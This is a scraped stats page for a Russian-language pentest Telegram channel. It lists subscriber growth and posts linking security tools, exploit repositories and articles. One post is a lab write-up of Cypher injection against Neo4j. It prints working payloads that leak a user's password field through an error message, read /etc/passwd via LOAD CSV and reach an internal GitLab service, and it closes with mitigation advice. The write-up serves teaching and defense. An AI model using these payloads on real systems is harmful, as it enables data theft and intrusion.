Fsecurity | HH
Open in Telegram
👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb
Show more2 073
Subscribers
+124 hours
+17 days
+930 days
Data loading in progress...
Similar Channels
Tags Cloud
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
September '26
September '26
+13
in 0 channels
August '26
+83
in 1 channels
Get PRO
July '26
+63
in 0 channels
Get PRO
June '26
+38
in 0 channels
Get PRO
May '26
+28
in 0 channels
Get PRO
April '26
+27
in 0 channels
Get PRO
March '26
+51
in 0 channels
Get PRO
February '26
+75
in 1 channels
Get PRO
January '26
+62
in 0 channels
Get PRO
December '25
+72
in 1 channels
Get PRO
November '25
+61
in 0 channels
Get PRO
October '25
+67
in 0 channels
Get PRO
September '25
+83
in 0 channels
Get PRO
August '25
+106
in 0 channels
Get PRO
July '25
+71
in 1 channels
Get PRO
June '25
+80
in 0 channels
Get PRO
May '25
+101
in 0 channels
Get PRO
April '25
+94
in 0 channels
Get PRO
March '25
+165
in 0 channels
Get PRO
February '25
+135
in 0 channels
Get PRO
January '25
+177
in 0 channels
Get PRO
December '24
+157
in 0 channels
Get PRO
November '24
+301
in 0 channels
Get PRO
October '24
+207
in 0 channels
Get PRO
September '24
+226
in 0 channels
Get PRO
August '24
+402
in 0 channels
Get PRO
July '24
+402
in 0 channels
Get PRO
June '24
+320
in 0 channels
Get PRO
May '24
+143
in 0 channels
Get PRO
April '24
+188
in 1 channels
Get PRO
March '24
+206
in 0 channels
Get PRO
February '24
+1 069
in 0 channels
| Date | Subscriber Growth | Mentions | Channels | |
| 09 September | +4 | |||
| 08 September | +3 | |||
| 07 September | 0 | |||
| 06 September | +1 | |||
| 05 September | +1 | |||
| 04 September | 0 | |||
| 03 September | +2 | |||
| 02 September | 0 | |||
| 01 September | +2 |
Channel Posts
Repost from 1N73LL1G3NC3
🔗 NTLMRain web lookup
🔗 NTLMRain CLI tool on GitHub
Recover NT hashes from NetNTLMv1 responses using local WebGPU computation and remote table lookup.
Blog: NetNTLMv1 Is Dead. Long Live NetNTLMv1.
Fitting lossless rainbow tables on a 4 TB disk and cracking NetNTLMv1 with WebGPU and ntlmrain.
Google’s release of the NetNTLMv1 rainbow tables made it much more practical to recover an NT hash from a NetNTLMv1 response captured with the fixed challenge 1122334455667788, further reducing the needed compute power.
NetNTLMv1 cracking is a problem I’ve kept returning to over the past several years. The recent table release prompted me to explore whether the process could be made cheaper, faster and easier to run. This post describes the result: a compact indexed table format, a WebGPU browser client and a native command-line tool.
| 2 | Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈 | 46 |
| 3 | 🔗Ссылка:
https://www.hackthebox.com/blog/new-academy-pricing | 49 |
| 4 | Уязвимость в ОС Qubes, позволяющая обойти изоляцию и выполнить код на уровне Dom0
Опубликована информация об уязвимости в операционной системе Qubes, использующей гипервизор для строгой изоляции приложений и компонентов ОС (каждый класс приложений и системные сервисы работают в отдельных виртуальных машинах). В случае если атакующий скомпрометирует одну из виртуальных машин, уязвимость позволяет обойти изоляцию, добиться выполнения произвольных команд на стороне хостового окружения (Dom0) и получить контроль над всей операционной системой. Проблема проявляется при использовании пользователем утилиты "qvm-copy-to-vm" для копирования файла из хостового окружения в подконтрольную атакующему виртуальную машину. Уязвимость устранена в обновлении пакета qubes-core-dom0-linux 4.3.22.
🔗Ссылка:
https://opennet.me/66232/ | 74 |
| 5 | 🦅 RavenEye
RavenEye — это универсальный инструмент разведки, который объединяет несколько этапов разведки в единый рабочий процесс.
Вместо ручного запуска множества инструментов и перемещения результатов между ними, RavenEye автоматизирует процесс и организует результаты для вас.
Меньше времени на управление разведкой. Больше времени на анализ цели.
🔗Ссылка:
https://github.com/RavenXxe/RavenEye.git | 82 |
| 6 | 🔗Ссылка:
https://github.com/dinosn/mikrotrick-poc | 78 |
| 7 | Ух.. звёзды, спасибо 👾 | 82 |
| 8 | Адаптивный червь подбирает индивидуальные уязвимости для каждого ПК
🔗Ссылка:
https://habr.com/ru/companies/globalsign/articles/1079126/ | 86 |
| 9 | SCCM под угрозой: устраняем ошибки конфигурации
🔗Ссылка:
https://habr.com/ru/companies/bizone/articles/1078144/ | 96 |
| 10 | От веба до захвата домена: чему пентестер может научиться на большой инфраструктуре
🔗Ссылка:
https://www.securitylab.ru/analytics/576944.php | 107 |
| 11 | 🔗Ссылка:
https://github.com/TarPeg007/CVE-2026-19490 | 104 |
| 12 | Дорогие друзья!
Презентуем вашему вниманию одиннадцатый выпуск журнала с крутецкими новостями инфобеза!
За каждую реакцию/коммент/репост - обняли, покружили, поставили обратно <3
____
🕺 backconnect | 103 |
| 13 | Ух... спасибо за звёзды ⭐️ | 119 |
| 14 | Всем хак 👾
Пост от меня.
Наконец-то попробовал мод BBS FS. Также перешёл на лаунчер XMCL и хорошенько перебрал свою сборку модов, выкинув оттуда весь ненужный мусор.
Вдобавок ко всему ещё и шейдеры топовые подобрал! 🌌
Ещё изучил гайды по Fusion в DaVinci Resolve. Оказывается, не такая уж это и сложная штука, но какой же мощный функционал она в себе скрывает!
Что это значит для вас?
— А значит это то, что ролики будут выходить ещё круче и качественнее! 🔥
⬆️ [Прошлый пост]
🍩 [Поддержать] | 117 |
| 15 | Drama RAT — вредоносное приложение, после установки которого действительно становится печально
Недавно на исследование в департамент комплексного реагирования на киберугрозы Positive Technologies (PT ESC IR) поступил ряд образцов банковского трояна для Android с функциями удаленного управления — Drama RAT. Это вредоносное семейство распространяется с помощью фишинговых сообщений в мессенджерах и маскируется под VPN-сервисы, банковские приложения и другие взломанные утилиты со встроенной платной функциональностью. Ранее о нем писали в УБК МВД.
🔗Ссылка:
https://habr.com/ru/companies/pt/articles/1077814/ | 118 |
| 16 | 🔗Ссылка:
https://github.com/DeathShotXD/0xM0nCrush | 121 |
| 17 | 🔗Ссылка:
https://github.com/MSNightmare/FalconFlank | 111 |
| 18 | Cypher-инъекция для атаки на базу данных Neo4j возникает по тем же причинам, что и SQL‑инъекция: приложение вставляет пользовательский ввод прямо в запрос к базе. В результате злоумышленник может изменить не только значение для поиска, но и логику самого запроса.
На одном из проектов по анализу защищённости нам встретилось веб-приложение, которое использовало базу Neo4j. В ней в том числе хранились данные пользователей, используемые при аутентификации. Мы обнаружили, что приложение формирует Cypher‑запросы путем прямой конкатенации пользовательского ввода - это и создавало риск инъекции.
Чтобы не раскрывать детали заказчика и безопасно воспроизвести найденные атаки, мы собрали локальный стенд с такой же уязвимостью. Все дальнейшие запросы и результаты показаны уже на нём, а используемые данные и внутренние сервисы являются тестовыми.
Суть проблемы:
Уязвимый код может выглядеть так:
query = f'MATCH (u:Users) WHERE u.login = "{user_input}" RETURN u'
Здесь введенный логин становится частью текста запроса и может изменить его содержание. Правильный вариант: оставить Cypher неизменным, а значение передать драйверу отдельно:
query = "MATCH (u:Users) WHERE u.login = $user_input RETURN u"
with driver.session() as session:
result = session.run(query, user_input=user_input)
В данном случае $user_input - это параметр запроса: драйвер передаёт его значение отдельно от текста запроса. Neo4j сначала компилирует запрос, а затем подставляет значение параметра, поэтому содержимое user_input интерпретируется как данные, а не как часть синтаксиса Cypher.
На практике:
На проекте сработала следующая цепочка, которую мы повторили на стенде. Сначала мы заставили Neo4j включить свойства объекта в текст ошибки. Запрос из Burp выглядел так:
GET /api/user?login="+OR+1%3D1+RETURN+toString(CASE+WHEN+1%3D1+THEN+properties(u)+ELSE+0+END)+// HTTP/1.1
Host: localhost:5001
Значение login после декодирования:
" OR 1=1 RETURN toString(CASE WHEN 1=1 THEN properties(u) ELSE 0 END) //
Кавычка закрывает исходную строку, OR делает условие истинным, а // комментирует хвост запроса.
Neo4j попытался преобразовать свойства объекта в строку и вернул ошибку типизации. Приложение показало ошибку целиком, поэтому в ответ попали свойства пользователя, включая password в виде ByteArray[...].
Neo.ClientError.Statement.TypeError:
Map{login -> "admin", password -> ByteArray[...]}
После этого проверили метки графа, локальный файл и внутренний сервис, внедряя вредоносные фрагменты Cypher в параметр login через функцию Inspector в модуле Burp Repeater:
" OR 1=1 WITH u LIMIT 1 CALL db.labels() YIELD label RETURN label //
" OR 1=1 WITH u LIMIT 1 LOAD CSV FROM "file:///etc/passwd" AS line RETURN line //
" OR 1=1 WITH u LIMIT 1 LOAD CSV FROM "http://gitlab-internal" AS line RETURN line //
Первый запрос вернул метку Users. Через LOAD CSV удалось прочитать строку из /etc/passwd и получить страницу внутреннего GitLab:
label = "Users"
root:x:0:0:root:/root:/bin/bash
<title>GitLab</title>
Чтение файлов и HTTP-запросы через LOAD CSV зависят от версии Neo4j, настроек, прав процесса и сетевых ограничений. На другой конфигурации эти запросы могут не сработать.
Результат:
Эксплуатация инъекции позволила получить не только доступ к данным графа. Сначала подробная ошибка Neo4j раскрыла свойства пользователя, включая поле password. На стенде удалось получить метку Users, прочитать строки из файла внутри контейнера Neo4j и обратиться к тестовому внутреннему HTTP-сервису. Таким образом, уязвимость в формировании Cypher‑запросов открыла возможность для нескольких векторов воздействия: извлечения данных узлов и связей, чтения локальных файлов сервера и обращения к доступным из Neo4j внутренним сервисам.
Для защиты от такой атаки рекомендуем:
— использовать параметризованные запросы,
— не возвращать клиенту информацию о содержании ошибки,
— выдать приложению минимальные права,
— ограничить LOAD CSV и исходящий трафик. | 108 |
| 19 | 🔗Ссылка:
https://github.com/NetSPI/AD-PathFinder | 105 |
| 20 | 🔗Ссылка:
https://github.com/iamthefrogy/frogscope/tree/main/frogscope | 108 |
